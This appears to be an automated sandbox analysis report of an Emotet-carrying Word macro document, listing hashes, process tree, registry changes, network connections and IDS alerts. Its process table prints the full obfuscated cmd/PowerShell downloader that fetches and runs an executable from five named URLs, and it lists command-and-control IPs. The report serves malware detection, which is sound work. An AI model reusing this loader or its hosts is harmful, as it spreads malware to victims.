| File name: | 2019_Januar_4659856783.doc |
| Full analysis: | https://app.any.run/tasks/87595df1-bfbc-4c84-a6fb-2e18ea74691c |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | January 18, 2019, 10:19:09 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/xml |
| File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
| MD5: | 9D74F8C600B8EA13123E6B8451EA594E |
| SHA1: | 235458A6D89957863D7A6EFFFBD3DB0A9C0CC2BA |
| SHA256: | D88ECC25B98D0BC09ED2C7D3E789905CE8AA7B2339A5ECDB6C0B7034CA1B2102 |
| SSDEEP: | 3072:jDX920f/bSvGff0dvqr+/iNKDzaJFUKc0UTE7yZRUV7RJeOzi8E:d2KS+RSaEDzYUTE7yZRVUi8E |
MALICIOUS
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 3624)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 3624)
Application was dropped or rewritten from another process
- 977.exe (PID: 3156)
- 977.exe (PID: 1832)
- wabmetagen.exe (PID: 3456)
- wabmetagen.exe (PID: 3988)
Downloads executable files from the Internet
- powershell.exe (PID: 3228)
EMOTET was detected
- wabmetagen.exe (PID: 3988)
Connects to CnC server
- wabmetagen.exe (PID: 3988)
Changes the autorun value in the registry
- wabmetagen.exe (PID: 3988)
SUSPICIOUS
Executes PowerShell scripts
- cmd.exe (PID: 2640)
Creates files in the user directory
- powershell.exe (PID: 3228)
Executable content was dropped or overwritten
- powershell.exe (PID: 3228)
- 977.exe (PID: 1832)
Starts itself from another location
- 977.exe (PID: 1832)
Connects to unusual port
- wabmetagen.exe (PID: 3988)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 3624)
Creates files in the user directory
- WINWORD.EXE (PID: 3624)
Dropped object may contain Bitcoin addresses
- powershell.exe (PID: 3228)
- 977.exe (PID: 1832)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
|---|---|---|
| .xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
| .xml | | | Generic XML (ASCII) (2.3) |
| .html | | | HyperText Markup Language (1.4) |
EXIF
XMP
| WordDocumentMacrosPresent: | yes |
|---|---|
| WordDocumentEmbeddedObjPresent: | no |
| WordDocumentOcxPresent: | no |
| WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
| WordDocumentDocumentPropertiesRevision: | 1 |
| WordDocumentDocumentPropertiesTotalTime: | - |
| WordDocumentDocumentPropertiesCreated: | 2019:01:18 06:57:00Z |
| WordDocumentDocumentPropertiesLastSaved: | 2019:01:18 06:57:00Z |
| WordDocumentDocumentPropertiesPages: | 1 |
| WordDocumentDocumentPropertiesWords: | 12 |
| WordDocumentDocumentPropertiesCharacters: | 73 |
| WordDocumentDocumentPropertiesLines: | 1 |
| WordDocumentDocumentPropertiesParagraphs: | 1 |
| WordDocumentDocumentPropertiesCharactersWithSpaces: | 84 |
| WordDocumentDocumentPropertiesVersion: | 16 |
| WordDocumentFontsDefaultFontsAscii: | Calibri |
| WordDocumentFontsDefaultFontsFareast: | Calibri |
| WordDocumentFontsDefaultFontsH-ansi: | Calibri |
| WordDocumentFontsDefaultFontsCs: | Times New Roman |
| WordDocumentFontsFontName: | Times New Roman |
| WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
| WordDocumentFontsFontCharsetVal: | 00 |
| WordDocumentFontsFontFamilyVal: | Roman |
| WordDocumentFontsFontPitchVal: | variable |
| WordDocumentFontsFontSigUsb-0: | E0002AFF |
| WordDocumentFontsFontSigUsb-1: | C0007841 |
| WordDocumentFontsFontSigUsb-2: | 00000009 |
| WordDocumentFontsFontSigUsb-3: | 00000000 |
| WordDocumentFontsFontSigCsb-0: | 000001FF |
| WordDocumentFontsFontSigCsb-1: | 00000000 |
| WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
| WordDocumentStylesLatentStylesDefLockedState: | off |
| WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
| WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
| WordDocumentStylesStyleType: | paragraph |
| WordDocumentStylesStyleDefault: | on |
| WordDocumentStylesStyleStyleId: | Normal |
| WordDocumentStylesStyleNameVal: | Normal |
| WordDocumentStylesStylePPrSpacingAfter: | 160 |
| WordDocumentStylesStylePPrSpacingLine: | 259 |
| WordDocumentStylesStylePPrSpacingLine-rule: | auto |
| WordDocumentStylesStyleRPrFontVal: | Calibri |
| WordDocumentStylesStyleRPrSzVal: | 22 |
| WordDocumentStylesStyleRPrSz-csVal: | 22 |
| WordDocumentStylesStyleRPrLangVal: | EN-US |
| WordDocumentStylesStyleRPrLangFareast: | EN-US |
| WordDocumentStylesStyleRPrLangBidi: | AR-SA |
| WordDocumentStylesStyleUiNameVal: | Table Normal |
| WordDocumentStylesStyleTblPrTblIndW: | - |
| WordDocumentStylesStyleTblPrTblIndType: | dxa |
| WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
| WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
| WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
| WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
| WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
| WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
| WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
| WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
| WordDocumentStylesStyleBasedOnVal: | Normal |
| WordDocumentStylesStyleLinkVal: | BalloonTextChar |
| WordDocumentStylesStyleRsidVal: | 005A24B1 |
| WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
| WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
| WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
| WordDocumentDocSuppDataBinDataName: | editdata.mso |
| WordDocumentDocSuppDataBinData: | (Binary data 65916 bytes, use -b option to extract) |
| WordDocumentShapeDefaultsShapedefaultsExt: | edit |
| WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
| WordDocumentShapeDefaultsShapelayoutExt: | edit |
| WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
| WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
| WordDocumentDocPrViewVal: | |
| WordDocumentDocPrZoomPercent: | 100 |
| WordDocumentDocPrRemovePersonalInformation: | - |
| WordDocumentDocPrDoNotEmbedSystemFonts: | - |
| WordDocumentDocPrDefaultTabStopVal: | 720 |
| WordDocumentDocPrPunctuationKerning: | - |
| WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
| WordDocumentDocPrOptimizeForBrowser: | - |
| WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
| WordDocumentDocPrPixelsPerInchVal: | 120 |
| WordDocumentDocPrValidateAgainstSchema: | - |
| WordDocumentDocPrSaveInvalidXMLVal: | off |
| WordDocumentDocPrIgnoreMixedContentVal: | off |
| WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
| WordDocumentDocPrCompatBreakWrappedTables: | - |
| WordDocumentDocPrCompatSnapToGridInCell: | - |
| WordDocumentDocPrCompatWrapTextWithPunct: | - |
| WordDocumentDocPrCompatUseAsianBreakRules: | - |
| WordDocumentDocPrCompatDontGrowAutofit: | - |
| WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
| WordDocumentDocPrRsidsRsidVal: | 003E487C |
| WordDocumentBodySectPRsidR: | 005E6EE1 |
| WordDocumentBodySectPRsidRDefault: | 003E487C |
| WordDocumentBodySectPRRsidRPr: | 00B901C0 |
| WordDocumentBodySectPRRPrNoProof: | - |
| WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
| WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
| WordDocumentBodySectPRPictShapetypeSpt: | 75 |
| WordDocumentBodySectPRPictShapetypePreferrelative: | t |
| WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
| WordDocumentBodySectPRPictShapetypeFilled: | f |
| WordDocumentBodySectPRPictShapetypeStroked: | f |
| WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
| WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
| WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
| WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
| WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
| WordDocumentBodySectPRPictShapetypeLockExt: | edit |
| WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
| WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
| WordDocumentBodySectPRPictBinData: | (Binary data 111550 bytes, use -b option to extract) |
| WordDocumentBodySectPRPictShapeId: | Picture 1 |
| WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
| WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
| WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square |
| WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
| WordDocumentBodySectPRPictShapeImagedataTitle: | - |
| WordDocumentBodySectPRT: | |
| WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
| WordDocumentBodySectSectPrPgSzW: | 12240 |
| WordDocumentBodySectSectPrPgSzH: | 15840 |
| WordDocumentBodySectSectPrPgMarTop: | 1440 |
| WordDocumentBodySectSectPrPgMarRight: | 1440 |
| WordDocumentBodySectSectPrPgMarBottom: | 1440 |
| WordDocumentBodySectSectPrPgMarLeft: | 1440 |
| WordDocumentBodySectSectPrPgMarHeader: | 720 |
| WordDocumentBodySectSectPrPgMarFooter: | 720 |
| WordDocumentBodySectSectPrPgMarGutter: | - |
| WordDocumentBodySectSectPrColsSpace: | 720 |
| WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
Total processes
38
Monitored processes
7
Malicious processes
4
Suspicious processes
3
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1832 | "C:\Users\Public\977.exe" | C:\Users\Public\977.exe | 977.exe | ||||||||||||
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Description: McAfee VirusScan Welcome Resource Exit code: 0 Version: 8, 0, 0, 26 Modules
| |||||||||||||||
| 2640 | c:\FantasticPlasticBallhn28\Intelligentv66\Takaj42\..\..\..\windows\system32\cmd.exe /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $MalaysianRinggitv64='Drivesp88';$Avonuw65=new-object Net.WebClient;$ArmenianDramp86='http://easyaccesshs.com/WYPsCYUe_89F0oV@http://dowseservices.com/Cna7kt_HtIAD2LqT_rXDH9b@http://www.immo-en-israel.com/mP7mhva_1xVx_6tOstw7@http://www.giancarlopuppo.com/tmp/3JBXN3_NmitWLk37_trb2wuQ@http://kcpaving.co.za/vTzd_4jLXhB6AV'.Split('@');$Woodenzv78='abilityak36';$Nevadaoq74 = '977';$Bedfordshiref76='Concretek63';$yellowz96=$env:public+'\'+$Nevadaoq74+'.exe';foreach($Omanp5 in $ArmenianDramp86){try{$Avonuw65.DownloadFile($Omanp5, $yellowz96);$Buckinghamshireqh53='arrayli8';If ((Get-Item $yellowz96).length -ge 80000) {Invoke-Item $yellowz96;$Skyways98='AutomotiveSportsmp23';break;}}catch{}}$WestVirginiaz96='IncredibleFreshShoesp44'; | c:\windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3156 | "C:\Users\Public\977.exe" | C:\Users\Public\977.exe | — | powershell.exe | |||||||||||
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Description: McAfee VirusScan Welcome Resource Exit code: 0 Version: 8, 0, 0, 26 Modules
| |||||||||||||||
| 3228 | powershell $MalaysianRinggitv64='Drivesp88';$Avonuw65=new-object Net.WebClient;$ArmenianDramp86='http://easyaccesshs.com/WYPsCYUe_89F0oV@http://dowseservices.com/Cna7kt_HtIAD2LqT_rXDH9b@http://www.immo-en-israel.com/mP7mhva_1xVx_6tOstw7@http://www.giancarlopuppo.com/tmp/3JBXN3_NmitWLk37_trb2wuQ@http://kcpaving.co.za/vTzd_4jLXhB6AV'.Split('@');$Woodenzv78='abilityak36';$Nevadaoq74 = '977';$Bedfordshiref76='Concretek63';$yellowz96=$env:public+'\'+$Nevadaoq74+'.exe';foreach($Omanp5 in $ArmenianDramp86){try{$Avonuw65.DownloadFile($Omanp5, $yellowz96);$Buckinghamshireqh53='arrayli8';If ((Get-Item $yellowz96).length -ge 80000) {Invoke-Item $yellowz96;$Skyways98='AutomotiveSportsmp23';break;}}catch{}}$WestVirginiaz96='IncredibleFreshShoesp44'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3456 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | 977.exe | |||||||||||
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Description: McAfee VirusScan Welcome Resource Exit code: 0 Version: 8, 0, 0, 26 Modules
| |||||||||||||||
| 3624 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019_Januar_4659856783.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3988 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | ||||||||||||
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Description: McAfee VirusScan Welcome Resource Exit code: 0 Version: 8, 0, 0, 26 Modules
| |||||||||||||||
Total events
1 509
Read events
1 083
Write events
416
Delete events
10
Modification events
| (PID) Process: | (3624) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | ;7' |
Value: 3B372700280E0000010000000000000000000000 | |||
| (PID) Process: | (3624) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3624) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (3624) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1311899678 | |||
| (PID) Process: | (3624) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1311899792 | |||
| (PID) Process: | (3624) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1311899793 | |||
| (PID) Process: | (3624) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 280E00005ADF8C4C17AFD40100000000 | |||
| (PID) Process: | (3624) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | a9' |
Value: 61392700280E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3624) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | a9' |
Value: 61392700280E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3624) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
Executable files
2
Suspicious files
2
Text files
1
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8BBB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3228 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J4P9RHLW9HD5DSDQ3T7C.temp | — | |
MD5:— | SHA256:— | |||
| 3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A862A36-C383-4CFC-BD6C-ACB6A08BBABA}.tmp | — | |
MD5:— | SHA256:— | |||
| 3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9B5C50B-96A0-41DB-8BB7-089D393CEB15}.tmp | — | |
MD5:— | SHA256:— | |||
| 3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4E38AADE-24F0-47FD-92E6-4FDF3F4D1A9B}.tmp | — | |
MD5:— | SHA256:— | |||
| 3624 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 3228 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1998cb.TMP | binary | |
MD5:— | SHA256:— | |||
| 3624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$19_Januar_4659856783.doc | pgc | |
MD5:— | SHA256:— | |||
| 3228 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 3228 | powershell.exe | C:\Users\Public\977.exe | executable | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
1
Threats
12
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3988 | wabmetagen.exe | GET | — | 190.138.221.70:53 | http://190.138.221.70:53/ | AR | — | — | malicious |
3228 | powershell.exe | GET | 200 | 129.232.138.186:80 | http://easyaccesshs.com/WYPsCYUe_89F0oV/ | ZA | executable | 340 Kb | suspicious |
3228 | powershell.exe | GET | 301 | 129.232.138.186:80 | http://easyaccesshs.com/WYPsCYUe_89F0oV | ZA | html | 314 b | suspicious |
3988 | wabmetagen.exe | GET | — | 186.67.88.242:465 | http://186.67.88.242:465/ | CL | — | — | suspicious |
3988 | wabmetagen.exe | GET | 200 | 59.102.162.246:995 | http://59.102.162.246:995/ | TW | binary | 132 b | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3228 | powershell.exe | 129.232.138.186:80 | easyaccesshs.com | HETZNER | ZA | suspicious |
3988 | wabmetagen.exe | 190.138.221.70:53 | — | Telecom Argentina S.A. | AR | malicious |
3988 | wabmetagen.exe | 189.129.160.167:20 | — | Uninet S.A. de C.V. | MX | malicious |
3988 | wabmetagen.exe | 186.67.88.242:465 | — | ENTEL CHILE S.A. | CL | suspicious |
3988 | wabmetagen.exe | 59.102.162.246:995 | — | TBC | TW | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
easyaccesshs.com |
| suspicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
3228 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3228 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3228 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3988 | wabmetagen.exe | A Network Trojan was detected | ET TROJAN HTTP GET Request on port 53 - Very Likely Hostile |
3988 | wabmetagen.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3988 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3988 | wabmetagen.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3988 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3988 | wabmetagen.exe | A Network Trojan was detected | SC SPYWARE Trojan-Banker.Win32.Emotet |
3988 | wabmetagen.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
1 ETPRO signatures available at the full report